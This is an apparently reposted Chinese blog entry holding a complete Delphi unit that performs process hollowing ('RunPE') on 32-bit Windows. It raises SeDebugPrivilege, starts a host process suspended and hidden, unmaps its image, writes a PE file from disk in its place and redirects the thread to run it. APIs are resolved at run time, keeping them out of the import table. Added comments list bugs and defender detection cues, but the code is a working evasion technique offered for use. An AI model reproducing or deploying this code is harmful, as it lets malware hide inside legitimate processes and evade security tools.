delphi 注入WIN7的单元


本文整理自网络,侵删。

  

EXE整体注入

intject.pas

unit intject;
// Process-hollowing ("RunPE") unit: InJect reads a PE file from disk and
// InTo maps it over a freshly created, suspended host process.
// 32-bit only: the implementation casts pointers through Cardinal and uses
// the x86 TContext register fields (Ebx / Eax).
interface
uses
Windows;
var
// Bound at run time in InTo with GetProcAddress instead of through a static
// import (the external declaration below is commented out). Detection note:
// neither name therefore shows up in the module's import table; the
// GetProcAddress string arguments are the static artefact to look for.
ZwUnmapViewOfSection:function(ProcessHandle:thandle; BaseAddress:Pointer):LongInt; stdcall;
// Also resolved dynamically in InTo, to CreateProcessW or CreateProcessA
// depending on the UNICODE define.
CreateProcessX:function(lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
//external 'ntdll.dll' name 'ZwUnmapViewOfSection';
type
PImageSectionHeaders = ^TImageSectionHeaders;
// Fixed-size view over a PE section table (96 is the Windows loader's
// section limit). Nothing in this unit checks NumberOfSections against
// this bound before indexing.
TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
// path: PE file to read from disk.
// path1: command line of the host process created in InTo (passed as
//        lpCommandLine with lpApplicationName = nil).
procedure InJect(path,path1:string);
implementation

function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
// Returns a pointer to the first section header of a PE image: the section
// table immediately follows the optional header, whose length is given by
// FileHeader.SizeOfOptionalHeader rather than by the record type.
// 32-bit only: the address arithmetic goes through Cardinal, which would
// truncate a 64-bit pointer.
var
  OptionalHeaderStart: Cardinal;
begin
  OptionalHeaderStart := Cardinal(@NTHeader.OptionalHeader);
  Result := PImageSectionHeader(OptionalHeaderStart + NTHeader.FileHeader.SizeOfOptionalHeader);
end;

function Protect(Characteristics: ULONG): ULONG;
// Translates a section's Characteristics flags into the PAGE_* constant
// used for VirtualProtectEx. Only the top three bits are consulted
// (bit 29 = IMAGE_SCN_MEM_EXECUTE, bit 30 = IMAGE_SCN_MEM_READ,
// bit 31 = IMAGE_SCN_MEM_WRITE); everything else in Characteristics
// is ignored. A writable section always maps to a read/write page,
// whether or not the read bit is set.
var
  MemBits: ULONG;
begin
  MemBits := Characteristics shr 29;   // 0..7: bit0 execute, bit1 read, bit2 write
  case MemBits of
    0:    Result := PAGE_NOACCESS;
    1:    Result := PAGE_EXECUTE;
    2:    Result := PAGE_READONLY;
    3:    Result := PAGE_EXECUTE_READ;
    4, 6: Result := PAGE_READWRITE;
  else
    Result := PAGE_EXECUTE_READWRITE;  // 5 and 7: write + execute
  end;
end;

procedure SetPrivilege;
// Best-effort attempt to enable SeDebugPrivilege on the current process
// token so that InTo can open and modify another process. Every failure
// is silent: the procedure returns nothing and raises nothing.
// NOTE(review): the token handle opened here is never closed, and the
// result of AdjustTokenPrivileges (which can return TRUE with
// ERROR_NOT_ALL_ASSIGNED when the privilege is not held) is not examined.
var
  Token: THandle;
  DebugLuid: TLargeInteger;
  Privs: TTokenPrivileges;
  ReturnedLen: DWORD;
begin
  // Open our own token for privilege adjustment only.
  if not OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, Token) then
    Exit;
  if not LookupPrivilegeValue(nil, 'SeDebugPrivilege', DebugLuid) then
    Exit;
  Privs.PrivilegeCount := 1;
  Privs.Privileges[0].Luid := DebugLuid;
  Privs.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;  // = 2
  ReturnedLen := 0;
  AdjustTokenPrivileges(Token, False, Privs, SizeOf(TTokenPrivileges), nil, ReturnedLen);
end;

procedure InTo(Buffer: Pointer; ProcessName: String);
// Core of the hollowing: starts ProcessName suspended, unmaps its original
// image, copies the PE held in Buffer into the host at the PE's preferred
// ImageBase, points the host's initial thread at the new entry point and
// resumes it. Buffer is expected to hold a complete, unmapped 32-bit PE
// file (the raw file bytes, as read by InJect).
//
// No API return value in this procedure is checked. Detection note for
// defenders: the sequence CREATE_SUSPENDED -> ZwUnmapViewOfSection ->
// VirtualAllocEx / WriteProcessMemory -> SetThreadContext -> ResumeThread
// is the textbook process-hollowing pattern that EDR and hunting rules
// key on.
Var
ProcessInfo           :TProcessInformation;
StartupInfo           :TStartupInfo;
Context               :TContext;
BaseAddress           :Pointer;          // host's original image base, later the new one
BytesRead             :DWORD;
BytesWritten          :DWORD;
I                     :ULONG;
OldProtect            :ULONG;
NTHeaders             :PImageNTHeaders;  // NT headers inside Buffer (file layout)
Sections              :PImageSectionHeaders;
Kernel,ntdll:LongWord;
Begin

FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
fillChar(StartupInfo, SizeOf(TStartupInfo),        0);
StartupInfo.cb := SizeOf(TStartupInfo);
// dwFlags stays 0 (no STARTF_USESHOWWINDOW), so this field is presumably ignored.
StartupInfo.wShowWindow := SW_HIDE;
{$IFDEF UNICODE}
Kernel:=LoadLibrary('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessW');
{$ELSE}
Kernel:=LoadLibraryW('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessA');
{$ENDIF}
ntdll:=LoadLibrary('ntdll.dll');
ZwUnmapViewOfSection:=GetProcAddress(ntdll,'ZwUnmapViewOfSection');
SetPrivilege;
// Host is created suspended so its initial thread has not executed any
// user-mode code yet. Failure of CreateProcessX is not detected here.
CreateProcessX(nil,PChar(ProcessName), NIL, NIL, false, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo);
FreeLibrary(Kernel);
// Only the integer register class is requested; see the note at SegGs below.
Context.ContextFlags := CONTEXT_INTEGER;
GetThreadContext(ProcessInfo.hThread, Context);
// On x86 the initial thread's Ebx is expected to hold the PEB pointer, and
// PEB+8 is ImageBaseAddress; this reads the host's current image base.
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead);
ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress);
// Both early exits below leave the now image-less suspended host alive and
// never close the handles in ProcessInfo.
if not Assigned(Buffer) then exit;
// No MZ / PE signature check is performed before following _lfanew.
NTHeaders:= PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
// Reserve and commit at the PE's preferred base. Relocations are never
// applied, so if that range is unavailable the load simply stops here.
BaseAddress:= VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE);
If not Assigned(BaseAddress) then exit;
// Headers first, then every section's raw data at its RVA, with the page
// protection derived from the section's Characteristics by Protect.
WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders,BytesWritten);
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
// NumberOfSections is not bounded against the 96-entry TImageSectionHeaders.
For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
begin
    WriteProcessMemory(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+Sections[I].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[I].PointerToRawData), Sections[I].SizeOfRawData, BytesWritten);
    VirtualProtectEx(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+ Sections[I].VirtualAddress),Sections[I].Misc.VirtualSize,
    Protect(Sections[I].Characteristics),OldProtect);
end;
// Point the host's PEB.ImageBaseAddress at the newly written image.
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesWritten);
// Eax is presumably the address the thread-start stub will transfer to;
// redirect it to the new image's entry point.
Context.Eax := ULONG(BaseAddress)+NTHeaders.OptionalHeader.AddressOfEntryPoint;
// NOTE(review): these selector and EFlags fields belong to the
// CONTEXT_SEGMENTS / CONTEXT_CONTROL classes, which ContextFlags above does
// not request, so SetThreadContext presumably ignores them -- confirm. The
// values are hard-coded x86 selectors and are not portable.
Context.SegGs:=0;
Context.SegFs:=$38;
Context.SegEs:=$20;
Context.SegDs:=$20;
Context.SegSs:=$20;
Context.SegCs:=$18;
Context.EFlags:=$3000;
FreeLibrary(ntdll);
// Apply the modified context; if that fails, kill the half-built host
// instead of resuming it. Handles in ProcessInfo are not closed on either path.
if not SetThreadContext(ProcessInfo.hThread, Context) then
        TerminateProcess(ProcessInfo.hProcess, 0)
Else resumeThread(ProcessInfo.hThread);
End;

procedure InJect(path,path1:string);
// Reads the whole file at path into a heap buffer and hands it to InTo,
// which runs it inside a new process started with the command line path1.
// No return value is checked: an unopenable file leaves the handle at
// INVALID_HANDLE_VALUE, GetFileSize then yields INVALID_FILE_SIZE, and a
// failed ReadFile passes an uninitialised buffer on; the caller gets no
// error feedback in any of these cases.
var
  FileHandle: DWORD;
  FileLen: DWORD;
  Transferred: DWORD;
  Image: Pointer;
begin
  FileHandle := CreateFile(PChar(path), GENERIC_READ, FILE_SHARE_READ, nil,
    OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  FileLen := GetFileSize(FileHandle, nil);
  GetMem(Image, FileLen);
  ReadFile(FileHandle, Image^, FileLen, Transferred, nil);
  InTo(Image, path1);
  // Release the file and the buffer only after InTo has finished with them.
  CloseHandle(FileHandle);
  FreeMem(Image);
end;
end.
